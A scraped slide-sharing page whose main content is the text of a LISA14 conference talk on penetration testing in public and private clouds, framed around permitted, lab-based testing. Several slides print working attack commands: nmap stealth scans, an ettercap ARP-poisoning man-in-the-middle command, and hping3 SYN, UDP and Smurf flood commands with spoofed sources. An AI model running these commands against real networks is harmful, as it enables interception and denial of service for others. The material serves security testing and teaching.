A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
kalichargn70th171
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Anthony Dahanne
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
How to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good PracticesHow to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good Practices
Globus
 
Accelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with PlatformlessAccelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with Platformless
WSO2
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Globus
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
Tier1 app
 
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Hivelance Technology
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2
 

Recently uploaded (20)

Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
 
Strategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptxStrategies for Successful Data Migration Tools.pptx
Strategies for Successful Data Migration Tools.pptx
 
SOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBrokerSOCRadar Research Team: Latest Activities of IntelBroker
SOCRadar Research Team: Latest Activities of IntelBroker
 
Designing for Privacy in Amazon Web Services
Designing for Privacy in Amazon Web ServicesDesigning for Privacy in Amazon Web Services
Designing for Privacy in Amazon Web Services
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
 
A Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdfA Comprehensive Look at Generative AI in Retail App Testing.pdf
A Comprehensive Look at Generative AI in Retail App Testing.pdf
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
How to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good PracticesHow to Position Your Globus Data Portal for Success Ten Good Practices
How to Position Your Globus Data Portal for Success Ten Good Practices
 
Accelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with PlatformlessAccelerate Enterprise Software Engineering with Platformless
Accelerate Enterprise Software Engineering with Platformless
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
 
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
 
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 

Lisa14

  • 1. 1 Penetration Testing in the Cloud Dan Lambright LISA14
  • 2. 2 Agenda ● Explore penetration testing on.. ● Public cloud ● Private cloud (owner) ● Private cloud (tenant)
  • 3. 3 Penetration Testing ● “Wargames” ● Mimic real attacks ● Test IDS/firewall detection ● Test security ● How ● Typically simulate attacks in a “safe” environment ● Or, attack actual machines ● Use special software, e.g. Nessus, metasploit, nmap..
  • 4. 4 Representative attacks spoofing Man in the middle Denial of service Port scans
  • 5. 5 Challenges on Cloud ● CSP have good security ● But, guests are your responsibility to protect ● Virtual ● No HW security appliances ● No low level access (grub) ● IP addresses may be ephermal ● Some pen tests could be expensive ● Penetration tests cannot affect others
  • 6. 6 Private Cloud Security ● Can't attack from cloud with spoofed source address ● Infrastructure resilient to DDOS (LOTS of bandwidth) ● Cannot sniff other tenant's traffic ● You could be attacked by any of.. ● Spoofing, portscan, MITM, DOS
  • 7. 7 Screenshot of break-in attempts AWS ●
  • 8. 8 Policies For Penetration Tests ● Most CSP will grant permission for a window of time ● No DOS tests ● No tests on instances that share physical network ● on AWS cannot use m1.small or t1.micro ● Some CSP have slow responses to requests
  • 9. 9 Commercial Tools ● CloudInspect ● On-demand pen tests ● DDOS sinks – Prolexic ● AlertLogic ● 24/7 response
  • 11. 11 Per instance vulnerability tests ● Do not wish to affect other instances ● Want to observe an instance's traffic ● Run an IDS against a particular instance
  • 13. 13 Bridges Bonding? No, do not want to Modify Can tap the interface with snort (run multiple snorts on host?) Could rate limit interfaces on bridges Openstack allows rate limits or absolute limits on accounts Tc – traffic shaper
  • 15. 15 Private Cloud Tenant ● Suppose wish to avoid network traffic ● How about attack from a container? ● IP address, MTU ● NAT for external connections ● “Ceiling” on container resources ● No “floor” / minimal guaranteed resources ● Skips external firewall !
  • 16. 16 Set up ● Kali – popular penetration ● testing distro ● Debian on red hat – ● 10.x.x.x subnet ● Import files (eg pcap) docker bridge V kali container instance V V qbr.. sudo docker run --privileged pandrew/kali /bin/bash
  • 17. 17 Port Scans ● nmap ● Network discovery tool ● Create “map” of network Examples nmap –sX (Xmas scan) nmap –sN (Null scan) nmap –sA (ACK scan)
  • 18. 18 Spoofing ● hping3 ● Examples nmap –sX (Xmas scan) nmap –sN (Null scan) nmap –sA (ACK scan)
  • 19. 19 Man in the Middle ● Ettercap ● Two machines, each with IP address ● Poison ARP table ● Simulate victim and middleman Examples apt-get install ettercap-text-only ettercap -T -M ARP -j /tmp/hosts.txt -F html.ef /172.17.0.26/ //
  • 20. 20 Denial of Service ● Hping3 from docker container ● Cannot stress system SYN attack to port 22 hping3 -c 10000 -d 120 -S -w 64 -p 22 --flood --rand-source -i eth0 172.17.42.1 lage UDP packets ●hping3 --rand-source --udp --flood -d 8192 172.17.42.1 Smurf sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=0 ●hping3 -1 --flood -a 172.17.0.23 172.17.255.255 ●Max bandwidth test... ●DDOS
  • 21. 21 Other ● Metasploit ● Curl command (ex. shellshocked) ● Lynx (html), but not limited to CLI..
  • 22. 22 Summary ● Cloud penetration testing is possible ● Coordinate with CSP ●
  • 23. RED HAT CONFIDENTIAL – DO NOT DISTRIBUTE Thank You! ● dlambright@redhat.com ● henry_lambright@uml.edu
  • 24. 24 Still Need Penetration Tests ● Port scans are not (necessarily) blocked